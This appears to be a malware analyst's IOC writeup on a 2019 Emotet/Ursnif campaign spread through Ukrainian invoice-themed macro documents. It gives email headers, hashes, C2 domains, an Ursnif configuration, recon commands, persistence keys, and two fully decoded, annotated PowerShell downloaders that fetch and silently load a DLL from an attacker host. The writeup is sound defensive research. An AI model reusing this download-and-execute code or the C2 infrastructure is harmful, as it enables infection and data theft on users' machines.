#emotet_ursnif_171019

  1. #IOC #OptiData #VR #emotet_doc #ursnif_payload #W97M #PowerShell #ENC #inject
  2.  
  3. https://pastebin.com/1XfkVE5e
  4.  
  5. previous_contact: n/a
  6.  
  7. FAQ: https://radetskiy.wordpress.com/2018/04/03/ioc_ursnif_020418/
  8.  
  9. attack_vector
  10. --------------
  11. email attach .DOC > macro > b64 > powershell > GET bin > %user%\*.bin (loaded via regsvr32 /s) > %user%\appdata\roaming\microsoft\audizfwk\adsnwave.dll (persisted via HKCU Run, loaded via rundll32 ...,DllRegisterServer)
  12.  
  13. email_headers (all three samples present the same HELO string, 5.61.57.146, while arriving from different source IPs; the infected host later connects to 5.61.57.146:80 — see comp)
  14. --------------
  15. #1
  16. Return-Path: <[email protected]>
  17. Received: from gateway36.websitewelcome.com (gateway36.websitewelcome.com [192.185.201.2])
  18. Received: from cm14.websitewelcome.com (cm14.websitewelcome.com [100.42.49.7])
  19. Received: from box5254.bluehost.com ([162.241.225.96])
  20. Received: from [89.253.149.192] (port=53724 helo=5.61.57.146)
  21. Subject: терміново  (uk: "urgent")
  22. Date: Thu, 17 Oct 2019 16:35:57 +0300
  23. X-Source-IP: 89.253.149.192
  24. X-Source-Sender: (5.61.57.146) [89.253.149.192]:53724
  25. X-Source-Auth: [email protected]
  26.  
  27. #2
  28. Return-Path: <[email protected]>
  29. Received: from gateway22.websitewelcome.com (gateway22.websitewelcome.com [192.185.46.142])
  30. Received: from cm16.websitewelcome.com (cm16.websitewelcome.com [100.42.49.19])
  31. Received: from box5254.bluehost.com ([162.241.225.96])
  32. Received: from [178.75.241.39] (port=9647 helo=5.61.57.146)
  33. Date: Thu, 17 Oct 2019 16:35:57 +0300
  34. Subject: Рахунок-Фактура №340  (uk: "Invoice No. 340")
  35. X-Source-IP: 178.75.241.39
  36. X-Source-Sender: (5.61.57.146) [178.75.241.39]:9647
  37. X-Source-Auth: [email protected]
  38.  
  39. #3
  40. Return-Path: <[email protected]>
  41. Received: from gproxy6-pub.mail.unifiedlayer.com (outbound-ss-348.hostmonster.com [74.220.202.212])
  42. Received: from cmgw15.unifiedlayer.com (unknown [10.9.0.15])
  43. Received: from box787.bluehost.com ([66.147.244.87])
  44. Received: from [62.176.68.133] (port=61085 helo=5.61.57.146)
  45. Date: Thu, 17 Oct 2019 16:22:40 +0300
  46. Subject: Рахунок за Газ №9282  (uk: "Gas bill No. 9282")
  47. X-Source-IP: 62.176.68.133
  48. X-Source-Sender: (5.61.57.146) [62.176.68.133]:61085
  49. X-Source-Auth: [email protected]
  50.  
  51. files
  52. --------------
  53. SHA-256 f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287
  54. File name rahunok#0027980.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  55. File size 285 KB (291840 bytes)
  56.  
  57. SHA-256 3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087
  58. File name rahunok#0037239.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  59. File size 329.5 KB (337408 bytes)
  60.  
  61. SHA-256 e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b
  62. File name hfsjaoipqewfbwoei.bin (point.dll) [PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit]
  63. File size 1.1 MB (1150976 bytes)
  64.  
  65. activity
  66. **************
  67. PL_SCR 161.117.39.210 limitsno{.} at/hfsjaoipqewfbwoei.bin  (note: the netwrk/comp sections below record the payload GET from 47.74.186.51, the same host as the C2 — confirm which IP limitsno{.}at resolved to at capture time and treat both as IOCs)
  68.  
  69. C2 47.74.186.51 vip-statistic{.} at
  70.  
  71. + @bomccss
  72. #ursnif config
  73. serpent_key: Dfei8OoQ0xhjTyql
  74. botnet-id: 700
  75. version: 217027
  76.  
  77. c2:
  78. cxzko43pnr7ujnte[.]onion
  79. vip-statistic[.]at
  80. intrade-support[.]at
  81. fresh-girls[.]at
  82.  
  83.  
  84. netwrk
  85. --------------
  86. [ssl]  (the google.com TLS handshake from explorer.exe is presumably a connectivity check — do not treat the 216.58.201.x addresses as IOCs)
  87. 216.58.201.78 google.com Client Hello
  88.  
  89. [http]  (the payload GET is sent with no User-Agent, while the C2 GET/POST use "Mozilla/4.0" — a usable proxy-log detection for the PowerShell downloader stage)
  90. 47.74.186.51 limitsno{.} at GET /hfsjaoipqewfbwoei.bin HTTP/1.1 noUA
  91. 47.74.186.51 vip-statistic{.} at GET /images/NFVfNmnFntzllAW_2/..../P1.gif HTTP/1.1 Mozilla/4.0
  92. 47.74.186.51 vip-statistic{.} at POST /images/ZP9eBpRUFTo1VIxz/.../C.bmp HTTP/1.1 Mozilla/4.0
  93.  
  94. comp
  95. --------------
  96. powershell.exe 2832 TCP localhost 49168 47.74.186.51 80 ESTABLISHED
  97. explorer.exe 1988 TCP localhost 49169 216.58.201.78 443 ESTABLISHED
  98. explorer.exe 1988 TCP localhost 49170 216.58.201.68 443 ESTABLISHED
  99. explorer.exe 1988 TCP localhost 49171 47.74.186.51 80 ESTABLISHED
  100. explorer.exe 1988 TCP localhost 49172 5.61.57.146 80 ESTABLISHED
  101.  
  102. proc  (host/network recon output — external IP via OpenDNS, systeminfo, net view, tasklist, driverquery, installed-software registry dump — is redirected into C:\tmp\*.bin1; the same directory later holds the zipped results listed under drop)
  103. --------------
  104. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  105. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enco (base64)
  106. "C:\Windows\system32\regsvr32.exe" /s C:\Users\operator\nKUXcZ.bin
  107. C:\Windows\system32\control.exe /?
  108. "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL /?
  109.  
  110. C:\Windows\system32\cmd.exe
  111. cmd.exe /C "nslookup myip.opendns.com resolver1.opendns.com > C:\tmp\415B.bi1"
  112. cmd /C "echo -------- >> C:\tmp\415B.bi1"
  113. "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  114.  
  115. cmd /C "systeminfo.exe > C:\tmp\A13.bin1"
  116. C:\Windows\system32\systeminfo.exe
  117.  
  118. cmd /C "net view >> C:\tmp\A13.bin1"
  119. C:\Windows\system32\net.exe net view
  120.  
  121. cmd /C "nslookup 127.0.0.1 >> C:\tmp\A13.bin1"
  122. cmd /C "tasklist.exe /SVC >> C:\tmp\A13.bin1"
  123.  
  124. cmd /C "driverquery.exe >> C:\tmp\A13.bin1"
  125. cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\tmp\A13.bin1"
  126.  
  127. persist  (Run value has a word-salad name; the DLL's 06.10.2019 file time predates the 18.10.2019 infection — possibly timestomped or a build/copy timestamp, verify against the sample)
  128. --------------
  129. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2019 14:07
  130.  
  131. crypssec Free Age SportsSignup Meat
  132. c:\users\operator\appdata\roaming\microsoft\audizfwk\adsnwave.dll 06.10.2019 13:51
  133.  
  134. @rundll32 "C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll",DllRegisterServer
  135.  
  136. drop
  137. --------------
  138. C:\Users\operator\nKUXcZ.bin
  139. C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll
  140. C:\tmp\A13.bin1 - zip archive of collected recon output (see proc)
  141. C:\tmp\415B.bi1 - zip archive of collected recon output (see proc)
  142. C:\tmp\D5D9.bin - zip archive of collected recon output
  143. C:\tmp\422B.bin - zip archive of collected recon output
  144. C:\tmp\2BF9.bin - zip archive of collected recon output
  145. C:\tmp\4DC3.bin - zip archive of collected recon output
  146. C:\tmp\3083.bin - zip archive of collected recon output
  147.  
  148. decoded b642powershell
  149. --------------
  150. #1
  # Decoded stage-1 downloader (from the macro's base64 -enco argument, sample #1).
  # Fetches the Ursnif DLL from limitsno{.}at to %USERPROFILE%\nKUXcZ.bin and
  # loads it with "regsvr32 /s". The URL is defanged ({.}) in this writeup, so
  # the text as shown will not run. Variables that are assigned once and never
  # read again are filler; only the lines marked below carry the logic.
  151. $yozninjdjc="wxvhw";  # filler, never read
  152. $kjqpsfw = "nKUXcZ";  # payload file name — matches C:\Users\operator\nKUXcZ.bin in proc/drop
  153. $kyvisokdvpou="iisvbivwcdfv";  # filler
  154. $bduhtq=$env:userprofile+"\"+$kjqpsfw+".bin";  # drop path: %USERPROFILE%\nKUXcZ.bin
  155. $shofvhgo="hfaho";  # filler
  156. $rwwci=&("new-object") net.webclient;  # cmdlet name passed as a string via the call operator (presumably to dodge naive keyword matching)
  157. $mznbayyscbf="clmvzpwymfxtqyuuq";  # filler
  158. $mtfyqp="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";  # payload URL (plain HTTP, no UA — see netwrk)
  159. $hxpdmkdtmrg="kclcrunb";  # filler
  160. Function dwnld{  # download-and-execute; recurses on any failure, no retry cap or delay
  161. $ndrrgwesufj="bqdtsgtsy";  # filler
  162. try{
  163. $ubjlvybhksmvmqz="svebvywesqwpbtt";  # filler
  164. $rwwci."DownloadFile"($mtfyqp, $bduhtq);  # WebClient.DownloadFile(url, path); method name as a string literal
  165. $nosvyxzfejquwqm="jaqaiyxlv";  # filler
  166. If ((.("Get-Item") $bduhtq)."length" -ge 200000) {  # size gate: anything under 200,000 bytes (e.g. an error page or truncated body) is treated as a failed download
  167. $pnpeirog="kmcyuo";  # filler
  168. $ugvjgt = Start-Process -FilePath "regsvr32.exe" -Args "/s $bduhtq" -Wait -NoNewWindow -PassThru;  # silently register/load the DLL (invokes its DllRegisterServer); the returned Process object is never used
  169. $ksecir="jvnvnwurbfdxqygqf";  # filler
  170. } else {
  171. $mhmwvmqfuybxwur="drffczm";  # filler
  172. dwnld;  # too small -> re-download; unbounded recursion until the size check passes or PowerShell's call-depth limit is hit
  173. $pemmvoigqmsza="jyeqziuppapb";  # filler
  174. }
  175. $cqhccbph="gvuz";  # filler
  176. }catch{
  177. $rcvwrhfjqqxxch="mqeezcoacfemgpkzkd";  # filler
  178. dwnld;  # any exception (DNS failure, HTTP error, write error) -> retry immediately, same unbounded recursion
  179. $vwdggtfwd="ovjvyghtjfxrnktgt";  # filler
  180. }}dwnld;  # closes catch and function, then invokes dwnld once — this is the script's entry point
  181. $zbadv="vccbbnzdpdyqgcv";  # filler
  182.  
  183. #2
  # Decoded stage-1 downloader from sample #2. Structurally identical to #1 —
  # same URL, same size gate, same regsvr32 /s load, same unbounded retry —
  # only the filler variable names and the drop file name (UJqEF.bin) differ.
  # Only nKUXcZ.bin from sample #1 appears in the proc/drop sections above, so
  # this variant's file is not confirmed on disk in this capture.
  184. $zhsiziqtdjjsyfye="nxoyyqtocw";  # filler, never read
  185. $mgvtio = "UJqEF";  # payload file name for this document variant
  186. $ithgawkqu="wgpqgqgnhjruhliad";  # filler
  187. $yueeoa=$env:userprofile+"\"+$mgvtio+".bin";  # drop path: %USERPROFILE%\UJqEF.bin
  188. $izbblp="zlzhdcptbhaunoglez";  # filler
  189. $ngvqvqb=&("new-object") net.webclient;  # cmdlet name as a string via the call operator
  190. $kltkpujnqzfofb="dzygqluhywhhvtx";  # filler
  191. $nslldzj="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";  # same payload URL as sample #1 (defanged)
  192. $rbntzlbqkulv="vvrfbdvtoo";  # filler
  193. Function dwnld{  # download-and-execute; recurses on any failure, no retry cap or delay
  194. $lazaxcmudbef="wzgiffoctszol";  # filler
  195. try{
  196. $wrqkxxidhtjrrcq="bviazvtzbmwpoiz";  # filler
  197. $ngvqvqb."DownloadFile"($nslldzj, $yueeoa);  # WebClient.DownloadFile(url, path)
  198. $wurllwckcoaobk="cwnwbf";  # filler
  199. If ((.("Get-Item") $yueeoa)."length" -ge 200000) {  # size gate: < 200,000 bytes is treated as a failed download
  200. $quyqejvsjujj="mzoffmbtc";  # filler
  201. $jdjpil = Start-Process -FilePath "regsvr32.exe" -Args "/s $yueeoa" -Wait -NoNewWindow -PassThru;  # silently load the DLL via regsvr32 (DllRegisterServer); Process object unused
  202. $gzvivurflv="koherilwrbkvczpi";  # filler
  203. } else {
  204. $ypcmgzp="zkupghelnqeegzm";  # filler
  205. dwnld;  # too small -> re-download (unbounded recursion)
  206. $zgxifpixbe="bwoffieyelusq";  # filler
  207. }
  208. $jbialh="huodfndgmg";  # filler
  209. }catch{
  210. $yjkwithuhhapy="ilcdki";  # filler
  211. dwnld;  # any exception -> immediate retry (unbounded recursion)
  212. $xlgnju="gpstdwckvbm";  # filler
  213. }}dwnld;  # closes catch and function, then invokes dwnld once — entry point
  214. $gxpfk="ehxqxmwggmw";  # filler
  215.  
  216.  
  217. # # #
  218. https://www.virustotal.com/gui/file/f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287/details
  219. https://www.virustotal.com/gui/file/3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087/details
  220. https://www.virustotal.com/gui/file/e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b/details
  221. https://analyze.intezer.com/#/analyses/4db134a6-ebba-4515-bb5e-1b6ef9ac81f1
  222.  
  223.  
  224. VR
  225.  
  226. @